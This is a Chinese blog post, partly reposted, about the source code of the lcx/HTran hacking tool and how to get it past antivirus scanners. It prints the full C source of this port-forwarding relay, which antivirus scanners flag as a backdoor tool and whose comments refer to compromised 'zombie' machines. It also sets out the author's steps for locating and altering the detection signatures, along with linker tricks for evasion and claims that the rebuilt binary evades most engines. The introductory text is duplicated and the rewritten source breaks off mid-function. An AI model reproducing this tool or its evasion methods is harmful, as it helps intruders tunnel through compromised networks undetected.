lcx源代码以及免杀的研究
2015-07-30 22:59
363 查看
==========================================================================
先转载一下别人的文章,后面有我的分析
==========================================================================
之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
因为使用的源代码编译,报毒不算很多,因为lcx使用的都是socket运行时不会被杀掉。基本上不报毒就是可以用了
使用debug方式发布的报毒
使用release方式发布的报毒情况,的确是多了那么几个但是没有想象中多的那么多
大体看了一下,其实就是很简单的运用了socket,三个核心函数bind2bind() conn2bind() conn2conn() 最后都是生成两个socket,之后放到transmitdata()里面传递数据
之前不大理解一个端口绑定两个socket,在代码里发现setsockopt()可以设置,因为每一个连接都由本地地址和远端地址的组合唯一确定,所以只要远端地址不同,两个套接口与一个地址捆绑并无大碍。为了通知WINDOWS套接口实现不要因为一个地址已被一个套接口使用就不让它与另一个套接口捆绑,应用程序可在bind()调用前先设置SO_REUSEADDR选项。
理论上来说只要找到特征码的那一段程序,然后改一改就可以了。
通常有源码情况下的免杀思路是使用MyCLL确定特征码,再通过特征码推出,原始语句并进行修改。
不过介于LCX的代码比较短,考虑直接从源代码入手。
四个核心函数bind2bind() conn2bind() conn2conn() transmitdata()分别注释掉。
注释掉 bind2bind() 报毒情况
注释掉 bind2bind() conn2bind() conn2conn() 报毒情况
注释掉 bind2bind() conn2bind() 报毒情况
注释掉 conn2bind() 报毒情况
其实这里我们只需要吧conn2bind()直接注释掉就可以了,它对应了-tran这个功能非常不常用,但是本着精益求精的态度,还是继续分析一下。
注释掉conn2bind()的函数内容,报毒反而增多了,有点诡异。
这里突然醒悟,其实特征码也不在conn2bind()中,而是在main()函数的一段代码,在这里只要把下面的代码注释掉就不会报错。
我们试着修改它一下
依旧报错了,还是那3个杀软。
试着加点料,结果还是不行
这时突然发现我又傻逼了,其实特征码应该在transmitdata()中,感觉江民定位的代码应该是这一句
如果是地址定位的话,换一换函数和变量的定义顺序应该就可以,但是没有生效。这里因为不想装一个杀软做测试所以,留个坑。
最后贴上几个比较通用的免杀方法,是看雪的一个神贴里面的。
http://bbs.pediy.com/showthread.php?t=134354
设置对齐方式
优化选项
区段的合并和独立
另外一种方法就是将一个文件的代码全部放置到一个自定义段中
===============================================
我从网上下载了好几个lcx,报毒非常严重,也贴出来吧,
下面贴出来源码(我修改过的):
实地测试的时候发现,3389映射成功,可以连接上但是屏幕是黑的不知道怎么回事,我试了试从网上下载来的lcx.exe也是黑屏
不知道怎么回事,还有就是ftp协议映射失败,telnet协议和http协议都映射正常,至于前面面两个为甚映射失败有机会我接着研究吧。
先转载一下别人的文章,后面有我的分析
==========================================================================
之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
报毒情况
因为使用的源代码编译,报毒不算很多,因为lcx使用的都是socket运行时不会被杀掉。基本上不报毒就是可以用了使用debug方式发布的报毒
使用release方式发布的报毒情况,的确是多了那么几个但是没有想象中多的那么多
源代码
大体看了一下,其实就是很简单的运用了socket,三个核心函数bind2bind() conn2bind() conn2conn() 最后都是生成两个socket,之后放到transmitdata()里面传递数据之前不大理解一个端口绑定两个socket,在代码里发现setsockopt()可以设置,因为每一个连接都由本地地址和远端地址的组合唯一确定,所以只要远端地址不同,两个套接口与一个地址捆绑并无大碍。为了通知WINDOWS套接口实现不要因为一个地址已被一个套接口使用就不让它与另一个套接口捆绑,应用程序可在bind()调用前先设置SO_REUSEADDR选项。
/* ************************************************************************************ * * HTran.cpp - HUC Packet Transmit Tool. * * Copyright (C) 2000-2004 HUC All Rights Reserved. * * Author : lion * : lion#cnhonker.net * : <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> * : * Notice : Thx to bkbll (bkbll#cnhonker.net) * : * Date : 2003-10-20 * : * Complie : cl HTran.cpp * : * Usage : E:\>HTran * : ======================== HUC Packet Transmit Tool V1.00 ======================= * : =========== Code by lion & bkbll, Welcome to <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> ========== * : * : [Usage of Packet Transmit:] * : HTran - [-log logfile] * : * : [option:] * : -listen * : -tran * : -slave * ************************************************************************************ */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <winsock.h> #include <signal.h> #include <errno.h> #include <io.h> #pragma comment(lib, "ws2_32.lib") #define VERSION "1.00" #define TIMEOUT 300 #define MAXSIZE 20480 #define HOSTLEN 40 #define CONNECTNUM 5 // define 2 socket struct struct transocket { SOCKET fd1; SOCKET fd2; }; // define function void ver(); void usage(char *prog); void transmitdata(LPVOID data); void getctrlc(int j); void closeallfd(); void makelog(char *buffer, int length); void proxy(int port); void bind2bind(int port1, int port2); void bind2conn(int port1, char *host, int port2); void conn2conn(char *host1, int port1, char *host2, int port2); int testifisvalue(char *str); int create_socket(); int create_server(int sockfd, int port); int client_connect(int sockfd, char* server, int port); // define GLOBAL variable here extern int errno; FILE *fp; int method=0; //int connectnum=0; //************************************************************************************ // // function main 主要是处理用户参数输入的问题 // //************************************************************************************ VOID main(int argc, char* argv[]) { char **p; char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN]; int iConnectPort=0, iTransmitPort=0; char *logfile=NULL; ver(); memset(sConnectHost, 0, HOSTLEN); memset(sTransmitHost, 0, HOSTLEN); p=argv; while(*p) { if(stricmp(*p, "-log") == 0) { if(testifisvalue(*(p+1))) { logfile = *(++p); } else { printf("[-] ERROR: Must supply logfile name.\r\n"); return; } p++; continue; } p++; } if(logfile !=NULL) { fp=fopen(logfile,"a"); if(fp == NULL ) { printf("[-] ERROR: open logfile"); return; } makelog("====== Start ======\r\n", 22); } // Win Start Winsock. WSADATA wsadata; WSAStartup(MAKEWORD(1, 1), &wsadata); signal(SIGINT, &getctrlc); if(argc > 2) { if(stricmp(argv[1], "-listen") == 0 && argc >= 4) { iConnectPort = atoi(argv[2]); iTransmitPort = atoi(argv[3]); method = 1; } else if(stricmp(argv[1], "-tran") == 0 && argc >= 5) { iConnectPort = atoi(argv[2]); strncpy(sTransmitHost, argv[3], HOSTLEN); iTransmitPort = atoi(argv[4]); method = 2; } else if(stricmp(argv[1], "-slave") == 0 && argc >= 6) { strncpy(sConnectHost, argv[2], HOSTLEN); iConnectPort = atoi(argv[3]); strncpy(sTransmitHost, argv[4], HOSTLEN); iTransmitPort = atoi(argv[5]); method = 3; } } switch(method) { case 1: bind2bind(iConnectPort, iTransmitPort); break; case 2: bind2conn(iConnectPort, sTransmitHost, iTransmitPort); break; case 3: conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); break; default: usage(argv[0]); break; } if(method) { closeallfd(); } WSACleanup(); return; } //************************************************************************************ // // print version message // //************************************************************************************ VOID ver() { printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION); printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); } //************************************************************************************ // // print usage message // //************************************************************************************ VOID usage(char* prog) { printf("[Usage of Packet Transmit:]\r\n"); printf(" %s - [-log logfile]\n\n", prog); printf("[option:]\n"); printf(" -listen \n"); printf(" -tran \n"); printf(" -slave \n\n"); return; } //************************************************************************************ // // test if is value // //************************************************************************************ int testifisvalue(char *str) { if(str == NULL ) return(0); if(str[0]=='-') return(0); return(1); } //************************************************************************************ // // LocalHost:ConnectPort transmit to LocalHost:TransmitPort // //************************************************************************************ void bind2bind(int port1, int port2) { SOCKET fd1,fd2, sockfd1, sockfd2; struct sockaddr_in client1,client2; int size1,size2; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; if((fd1=create_socket())==0) return; if((fd2=create_socket())==0) return; printf("[+] Listening port %d ......\r\n",port1); fflush(stdout); if(create_server(fd1, port1)==0) { closesocket(fd1); return; } printf("[+] Listen OK!\r\n"); printf("[+] Listening port %d ......\r\n",port2); fflush(stdout); if(create_server(fd2, port2)==0) { closesocket(fd2); return; } printf("[+] Listen OK!\r\n"); size1=size2=sizeof(struct sockaddr); while(1) { printf("[+] Waiting for Client on port:%d ......\r\n",port1); if((sockfd1 = accept(fd1,(struct sockaddr *)&client1,&size1))<0) { printf("[-] Accept1 error.\r\n"); continue; } printf("[+] Accept a Client on port %d from %s ......\r\n", port1, inet_ntoa(client1.sin_addr)); printf("[+] Waiting another Client on port:%d....\r\n", port2); if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0) { printf("[-] Accept2 error.\r\n"); closesocket(sockfd1); continue; } printf("[+] Accept a Client on port %d from %s\r\n",port2, inet_ntoa(client2.sin_addr)); printf("[+] Accept Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } } //************************************************************************************ // // LocalHost:ConnectPort transmit to TransmitHost:TransmitPort // //************************************************************************************ void bind2conn(int port1, char *host, int port2) { SOCKET sockfd,sockfd1,sockfd2; struct sockaddr_in remote; int size; char buffer[1024]; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; if (port1 > 65535 || port1 < 1) { printf("[-] ConnectPort invalid.\r\n"); return; } if (port2 > 65535 || port2 < 1) { printf("[-] TransmitPort invalid.\r\n"); return; } memset(buffer,0,1024); if((sockfd=create_socket()) == INVALID_SOCKET) return; if(create_server(sockfd, port1) == 0) { closesocket(sockfd); return; } size=sizeof(struct sockaddr); while(1) { printf("[+] Waiting for Client ......\r\n"); if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0) { printf("[-] Accept error.\r\n"); continue; } printf("[+] Accept a Client from %s:%d ......\r\n", inet_ntoa(remote.sin_addr), ntohs(remote.sin_port)); if((sockfd2=create_socket())==0) { closesocket(sockfd1); continue; } printf("[+] Make a Connection to %s:%d ......\r\n",host,port2); fflush(stdout); if(client_connect(sockfd2,host,port2)==0) { closesocket(sockfd2); sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", host, port2); send(sockfd1,buffer,strlen(buffer),0); memset(buffer, 0, 1024); closesocket(sockfd1); continue; } printf("[+] Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } } //************************************************************************************ // // ConnectHost:ConnectPort transmit to TransmitHost:TransmitPort // //************************************************************************************ void conn2conn(char *host1,int port1,char *host2,int port2) { SOCKET sockfd1,sockfd2; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; fd_set fds; int l; char buffer[MAXSIZE]; while(1) { /* while(connectnum) { if(connectnum < CONNECTNUM) { Sleep(10000); break; } else { Sleep(TIMEOUT*1000); continue; } } */ if((sockfd1=create_socket())==0) return; if((sockfd2=create_socket())==0) return; printf("[+] Make a Connection to %s:%d....\r\n",host1,port1); fflush(stdout); if(client_connect(sockfd1,host1,port1)==0) { closesocket(sockfd1); closesocket(sockfd2); continue; } // fix by bkbll // if host1:port1 recved data, than connect to host2,port2 l=0; memset(buffer,0,MAXSIZE); while(1) { FD_ZERO(&fds); FD_SET(sockfd1, &fds); if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) { if (errno == WSAEINTR) continue; break; } if (FD_ISSET(sockfd1, &fds)) { l=recv(sockfd1, buffer, MAXSIZE, 0); break; } Sleep(5); } if(l<=0) { printf("[-] There is a error...Create a new connection.\r\n"); continue; } while(1) { printf("[+] Connect OK!\r\n"); printf("[+] Make a Connection to %s:%d....\r\n", host2,port2); fflush(stdout); if(client_connect(sockfd2,host2,port2)==0) { closesocket(sockfd1); closesocket(sockfd2); continue; } if(send(sockfd2,buffer,l,0)==SOCKET_ERROR) { printf("[-] Send failed.\r\n"); continue; } l=0; memset(buffer,0,MAXSIZE); break; } printf("[+] All Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } // connectnum++; Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } } //************************************************************************************ // // Socket Transmit to Socket // //************************************************************************************ void transmitdata(LPVOID data) { SOCKET fd1, fd2; transocket *sock; struct timeval timeset; fd_set readfd,writefd; int result,i=0; char read_in1[MAXSIZE],send_out1[MAXSIZE]; char read_in2[MAXSIZE],send_out2[MAXSIZE]; int read1=0,totalread1=0,send1=0; int read2=0,totalread2=0,send2=0; int sendcount1,sendcount2; int maxfd; struct sockaddr_in client1,client2; int structsize1,structsize2; char host1[20],host2[20]; int port1=0,port2=0; char tmpbuf[100]; sock = (transocket *)data; fd1 = sock->fd1; fd2 = sock->fd2; memset(host1,0,20); memset(host2,0,20); memset(tmpbuf,0,100); structsize1=sizeof(struct sockaddr); structsize2=sizeof(struct sockaddr); if(getpeername(fd1,(struct sockaddr *)&client1,&structsize1)<0) { strcpy(host1, "fd1"); } else { // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); strcpy(host1, inet_ntoa(client1.sin_addr)); port1=ntohs(client1.sin_port); } if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0) { strcpy(host2,"fd2"); } else { // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); strcpy(host2, inet_ntoa(client2.sin_addr)); port2=ntohs(client2.sin_port); } printf("[+] Start Transmit (%s:%d <-> %s:%d) ......\r\n\n", host1, port1, host2, port2); maxfd=max(fd1,fd2)+1; memset(read_in1,0,MAXSIZE); memset(read_in2,0,MAXSIZE); memset(send_out1,0,MAXSIZE); memset(send_out2,0,MAXSIZE); timeset.tv_sec=TIMEOUT; timeset.tv_usec=0; while(1) { FD_ZERO(&readfd); FD_ZERO(&writefd); FD_SET((UINT)fd1, &readfd); FD_SET((UINT)fd1, &writefd); FD_SET((UINT)fd2, &writefd); FD_SET((UINT)fd2, &readfd); result=select(maxfd,&readfd,&writefd,NULL,×et); if((result<0) && (errno!=EINTR)) { printf("[-] Select error.\r\n"); break; } else if(result==0) { printf("[-] Socket time out.\r\n"); break; } if(FD_ISSET(fd1, &readfd)) { /* must < MAXSIZE-totalread1, otherwise send_out1 will flow */ if(totalread1) { read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); if((read1==SOCKET_ERROR) || (read1==0)) { printf("[-] Read fd1 data error,maybe close?\r\n"); break; } memcpy(send_out1+totalread1,read_in1,read1); sprintf(tmpbuf,"\r\nRecv %5d bytes from %s:%d\r\n", read1, host1, port1); printf(" Recv %5d bytes %16s:%d\r\n", read1, host1, port1); makelog(tmpbuf,strlen(tmpbuf)); makelog(read_in1,read1); totalread1+=read1; memset(read_in1,0,MAXSIZE); } } if(FD_ISSET(fd2, &writefd)) { int err=0; sendcount1=0; while(totalread1>0) { send1=send(fd2, send_out1+sendcount1, totalread1, 0); if(send1==0)break; if((send1<0) && (errno!=EINTR)) { printf("[-] Send to fd2 unknow error.\r\n"); err=1; break; } if((send1<0) && (errno==ENOSPC)) break; sendcount1+=send1; totalread1-=send1; printf(" Send %5d bytes %16s:%d\r\n", send1, host2, port2); } if(err==1) break; if((totalread1>0) && (sendcount1>0)) { /* move not sended data to start addr */ memcpy(send_out1,send_out1+sendcount1,totalread1); memset(send_out1+totalread1,0,MAXSIZE-totalread1); } else memset(send_out1,0,MAXSIZE); } if(FD_ISSET(fd2, &readfd)) { if(totalread2) { read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); if(read2==0)break; if((read2<0) && (errno!=EINTR)) { printf("[-] Read fd2 data error,maybe close?\r\n\r\n"); break; } memcpy(send_out2+totalread2,read_in2,read2); sprintf(tmpbuf, "\r\nRecv %5d bytes from %s:%d\r\n", read2, host2, port2); printf(" Recv %5d bytes %16s:%d\r\n", read2, host2, port2); makelog(tmpbuf,strlen(tmpbuf)); makelog(read_in2,read2); totalread2+=read2; memset(read_in2,0,MAXSIZE); } } if(FD_ISSET(fd1, &writefd)) { int err2=0; sendcount2=0; while(totalread2>0) { send2=send(fd1, send_out2+sendcount2, totalread2, 0); if(send2==0)break; if((send2<0) && (errno!=EINTR)) { printf("[-] Send to fd1 unknow error.\r\n"); err2=1; break; } if((send2<0) && (errno==ENOSPC)) break; sendcount2+=send2; totalread2-=send2; printf(" Send %5d bytes %16s:%d\r\n", send2, host1, port1); } if(err2==1) break; if((totalread2>0) && (sendcount2 > 0)) { /* move not sended data to start addr */ memcpy(send_out2, send_out2+sendcount2, totalread2); memset(send_out2+totalread2, 0, MAXSIZE-totalread2); } else memset(send_out2,0,MAXSIZE); } Sleep(5); } closesocket(fd1); closesocket(fd2); // if(method == 3) // connectnum --; printf("\r\n[+] OK! I Closed The Two Socket.\r\n"); } void getctrlc(int j) { printf("\r\n[-] Received Ctrl+C\r\n"); closeallfd(); exit(0); } void closeallfd() { int i; printf("[+] Let me exit ......\r\n"); fflush(stdout); for(i=3; i<256; i++) { closesocket(i); } if(fp != NULL) { fprintf(fp,"\r\n====== Exit ======\r\n"); fclose(fp); } printf("[+] All Right!\r\n"); } int create_socket() { int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<0) { printf("[-] Create socket error.\r\n"); return(0); } return(sockfd); } int create_server(int sockfd,int port) { struct sockaddr_in srvaddr; int on=1; memset(&srvaddr, 0, sizeof(struct sockaddr)); srvaddr.sin_port=htons(port); srvaddr.sin_family=AF_INET; srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //so I can rebind the port if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) { printf("[-] Socket bind error.\r\n"); return(0); } if(listen(sockfd,CONNECTNUM)<0) { printf("[-] Socket Listen error.\r\n"); return(0); } return(1); } int client_connect(int sockfd,char* server,int port) { struct sockaddr_in cliaddr; struct hostent *host; if(!(host=gethostbyname(server))) { printf("[-] Gethostbyname(%s) error:%s\n",server,strerror(errno)); return(0); } memset(&cliaddr, 0, sizeof(struct sockaddr)); cliaddr.sin_family=AF_INET; cliaddr.sin_port=htons(port); cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) { printf("[-] Connect error.\r\n"); return(0); } return(1); } void makelog(char *buffer,int length) { if(fp !=NULL) { // fprintf(fp, "%s", buffer); // printf("%s",buffer); write(fileno(fp),buffer,length); // fflush(fp); } }
关于免杀
理论上来说只要找到特征码的那一段程序,然后改一改就可以了。通常有源码情况下的免杀思路是使用MyCLL确定特征码,再通过特征码推出,原始语句并进行修改。
不过介于LCX的代码比较短,考虑直接从源代码入手。
四个核心函数bind2bind() conn2bind() conn2conn() transmitdata()分别注释掉。
注释掉 bind2bind() 报毒情况
Ikarus Backdoor.Win32.Liondoor 20130709 Kaspersky not-a-virus:HEUR:NetTool.Win32.Transmit.gen 20130709
注释掉 bind2bind() conn2bind() conn2conn() 报毒情况
妥妥的没有毒~~~
注释掉 bind2bind() conn2bind() 报毒情况
还是妥妥的没有毒~~~
注释掉 conn2bind() 报毒情况
依旧是妥妥的没有毒~~~
其实这里我们只需要吧conn2bind()直接注释掉就可以了,它对应了-tran这个功能非常不常用,但是本着精益求精的态度,还是继续分析一下。
注释掉conn2bind()的函数内容,报毒反而增多了,有点诡异。
ESET-NOD32 a variant of Win32/HackTool.Hucline.C 20130708 Jiangmin Heur:Backdoor/RemoteControl 20130709 Kaspersky not-a-virus:HEUR:NetTool.Win32.Transmit.gen 20130709
这里突然醒悟,其实特征码也不在conn2bind()中,而是在main()函数的一段代码,在这里只要把下面的代码注释掉就不会报错。
switch(method) { case 1: bind2bind(iConnectPort, iTransmitPort); break; case 2: bind2conn(iConnectPort, sTransmitHost, iTransmitPort); break; case 3: conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); break; default: usage(argv[0]); break; }
我们试着修改它一下
if (method==1) bind2bind(iConnectPort, iTransmitPort); else if (method==2) bind2conn(iConnectPort, sTransmitHost, iTransmitPort); else if (method==3) conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); else usage(argv[0]);
依旧报错了,还是那3个杀软。
试着加点料,结果还是不行
if (method==1){ __asm nop; bind2bind(iConnectPort, iTransmitPort); } else if (method==2){ __asm nop; bind2conn(iConnectPort, sTransmitHost, iTransmitPort); } else if (method==3){ __asm nop; conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); } else { __asm nop; usage(argv[0]); }
这时突然发现我又傻逼了,其实特征码应该在transmitdata()中,感觉江民定位的代码应该是这一句
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID);
如果是地址定位的话,换一换函数和变量的定义顺序应该就可以,但是没有生效。这里因为不想装一个杀软做测试所以,留个坑。
最后贴上几个比较通用的免杀方法,是看雪的一个神贴里面的。
http://bbs.pediy.com/showthread.php?t=134354
设置对齐方式
#pragma comment(linker, "/FILEALIGN:16") // 设置最小节的大小,数值越小文件的体积就越小,不过最小是16 #pragma comment(linker, "/ALIGN:16")
优化选项
// 清除从未引用的函数和/或数据 #pragma comment(linker, "/opt:ref") #pragma comment (linker, "/OPT:ICF") // 获得精简应用程序,减小体积 #pragma comment(linker, "/opt:nowin98")
区段的合并和独立
// 设置data段属性为可读可写可执行 #pragma comment(linker, "/section:.data,RWE") // 接下来就可以进行区段合并操作了比如,将上面的text和rdata都合并到data去 #pragma comment(linker, "/MERGE:.rdata=.data") #pragma comment(linker, "/MERGE:.text=.data")
另外一种方法就是将一个文件的代码全部放置到一个自定义段中
#pragma code_seg("section1")
===============================================
以上都转载别人的文章,下面是我自己写的。
我把lcx的代码重构了一遍,并添加了中文注释,没有做任何免杀处理,多引擎杀毒只有一款冰岛的杀毒软件还查杀的出来其他
全都过了,源码免杀就是强悍呀,貌似反汇编免杀目前只有真正的牛人才可以做到,对于普通人来言这门技术已失去其含义。
贴出来查杀结果:
我从网上下载了好几个lcx,报毒非常严重,也贴出来吧,
下面贴出来源码(我修改过的):
/* ************************************************************************************ * * HTran.cpp - HUC Packet Transmit Tool. * * Copyright (C) 2000-2004 HUC All Rights Reserved. * * Author : lion * : lion#cnhonker.net * : <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> * : * Notice : Thx to bkbll (bkbll#cnhonker.net) * : * Date : 2003-10-20 * : * Complie : cl HTran.cpp * : * Usage : E:\>HTran * : ======================== HUC Packet Transmit Tool V1.00 ======================= * : =========== Code by lion & bkbll, Welcome to <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> ========== * : * : [Usage of Packet Transmit:] * : HTran - [-log logfile] * : * : [option:] * : -listen * : -tran * : -slave * ************************************************************************************ */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <winsock.h> #include <signal.h> #include <errno.h> #include <io.h> #pragma comment(lib, "ws2_32.lib") //禁用提示 #pragma warning(disable:4996) //禁用窗口模式 //#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") #define VERSION "1.00" //版本号 #define TIMEOUT 300 //超时时间(五分钟) #define MAXSIZE 20480 //最大数据包 #define HOSTLEN 40 //地址长度 #define CONNECTNUM 5 //最大连接 //线程传参结构体 struct transocket { SOCKET fd1; SOCKET fd2; }; //函数定义 void transmitdata(LPVOID data); void closeallfd(); void bind2bind(int port1, int port2); void bind2conn(int port1, char *host, int serverPort); void conn2conn(char *publicIP, int publicPort, char *host2, int port2); int create_socket(); int create_server(int sockfd, int port); int client_connect(int sockfd, char* server, int port); FILE *fp; //日志文件 char log[256]; //log缓冲区 int method=0; //输出日志 void makelog(bool print, LPCTSTR lpFormat, ...) { //解析参数 TCHAR szArgMessage[3000] = {0}; va_list args; va_start(args, lpFormat); _vstprintf(szArgMessage, lpFormat, args); va_end(args); szArgMessage[strlen(szArgMessage)]='\r'; szArgMessage[strlen(szArgMessage)]='\n'; //输出到屏幕 if (print) { printf("%s",szArgMessage); fflush(stdout); } try { if(fp !=NULL) { SYSTEMTIME st; GetSystemTime(&st); TCHAR szArgMessageTime[3000] = {0}; _sntprintf(szArgMessageTime,3000,"%d%d%d%d%d%d---%s",st.wYear,st.wMonth,st.wDay,st.wHour,st.wMinute,st.wSecond,szArgMessage); write(fileno(fp),szArgMessageTime,strlen(szArgMessageTime)); } } catch (...) { } } //接收 CTRL+C void getctrlc(int j) { makelog(true,"接收到 Ctrl+C 结束程序"); closeallfd(); exit(0); } //版本信息 VOID ver() { printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION); printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); } //打印提示 VOID usage(char* prog) { printf("[Usage of Packet Transmit:]\r\n"); printf(" %s - [-log logfile]\n\n", prog); printf("[option:]\n"); printf(" -listen <ConnectPort> <TransmitPort>\n"); printf(" -tran <ConnectPort> <TransmitHost> <TransmitPort>\n"); printf(" -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>\n\n"); return; } //检验字符 int TestIsValue(char *str) { if(str == NULL ) return(0); if(str[0]=='-') return(0); return(1); } //************************************************************************************ // // function main 主要是处理用户参数输入的问题 // //************************************************************************************ VOID main(int argc, char* argv[]) { char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN]; int iConnectPort=0, iTransmitPort=0; char *logfile=NULL; ver(); memset(sConnectHost, 0, HOSTLEN); memset(sTransmitHost, 0, HOSTLEN); //支持log文件 fp=fopen("lcx.log","a"); if(fp == NULL ) { printf("创建日志文件失败"); return; } makelog(true,"lcx程序启动中..."); //初始化网络库 WSADATA wsadata; WSAStartup(MAKEWORD(2, 2), &wsadata); //接收 CTRL+C signal(SIGINT, &getctrlc); if(argc > 2) { //中转服务器 if(stricmp(argv[1], "-listen") == 0 && argc >= 4) { iConnectPort = atoi(argv[2]); iTransmitPort = atoi(argv[3]); method = 1; } else if(stricmp(argv[1], "-tran") == 0 && argc >= 5) { iConnectPort = atoi(argv[2]); strncpy(sTransmitHost, argv[3], HOSTLEN); iTransmitPort = atoi(argv[4]); method = 2; } //肉鸡(有可能是其他机器) else if(stricmp(argv[1], "-slave") == 0 && argc >= 6) { strncpy(sConnectHost, argv[2], HOSTLEN); iConnectPort = atoi(argv[3]); strncpy(sTransmitHost, argv[4], HOSTLEN); iTransmitPort = atoi(argv[5]); method = 3; } } switch(method) { case 1: bind2bind(iConnectPort, iTransmitPort); break; case 2: bind2conn(iConnectPort, sTransmitHost, iTransmitPort); break; case 3: conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); break; default: usage(argv[0]); break; } if(method) { closeallfd(); } WSACleanup(); return; } //绑定两个服务器socket void bind2bind(int port1, int port2) { makelog(true,"成功创建服务器..."); SOCKET fd1,fd2, sockfd1, sockfd2; struct sockaddr_in client1,client2; transocket sock; DWORD dwThreadID; if((fd1=create_socket())==0) return; if((fd2=create_socket())==0) return; //创建第一个服务器 if(create_server(fd1, port1)==0) { closesocket(fd1); return; } makelog(true, "成功监听端口 :%d", port1); //创建第二个服务器 if(create_server(fd2, port2)==0) { closesocket(fd2); return; } makelog(true, "成功监听端口 :%d", port2); //死循环等待两方客户端上线 int size1,size2; size1=size2=sizeof(struct sockaddr); while(1) { //等待第一个个客户上线端口 makelog(true, "等待上线端口 :%d", port1); if((sockfd1 = accept(fd1, (struct sockaddr *)&client1, &size1))<0) { makelog(true, "accept函数出现问题"); continue; } makelog(true, "第一个客户端成功上线,端口:%d IP地址:%s", port1, inet_ntoa(client1.sin_addr)); //第二个客户端上线 makelog(true, "等待上线端口 :%d", port2); if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0) { makelog(true, "accept函数出现问题"); closesocket(sockfd1); continue; } makelog(true, "第二个客户端成功上线,端口:%d IP地址:%s", port2, inet_ntoa(client2.sin_addr)); makelog(true, "创建数据转发的线程"); //线程传参,把两个服务器的socket传到线程里面 sock.fd1 = sockfd1; sock.fd2 = sockfd2; HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { makelog(true, "强制结束数据转发的线程"); TerminateThread(hThread, 0); return; } Sleep(1000); makelog(true, "创建数据转发的线程---成功"); } } //代理服务器(我觉得这么叫比较合适) //参数一:本地监听端口 //参数二、三:远程IP和端口 void bind2conn(int server1Port, char *server2IP, int server2Port) { SOCKET sockfd,sockfd1,sockfd2; struct sockaddr_in remote; //校验端口非法 if (server1Port > 65535 || server1Port < 1) { makelog(true, "端口非法"); return; } if (server2Port > 65535 || server2Port < 1) { makelog(true, "端口非法"); return; } //创建套接字 char buffer[1024]; memset(buffer,0,1024); if((sockfd=create_socket()) == INVALID_SOCKET) return; //创建服务器 if(create_server(sockfd, server1Port) == 0) { closesocket(sockfd); return; } while(1) { makelog(true, "等待客户端连接到本服务器"); int size=sizeof(struct sockaddr); if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0) { makelog(true, "accept函数失败"); continue; } makelog(true, "成功接收一个客户端 %s:%d",inet_ntoa(remote.sin_addr), ntohs(remote.sin_port)); if((sockfd2=create_socket())==0) { closesocket(sockfd1); continue; } makelog(true, "连接到远程服务器 %s:%d ......", 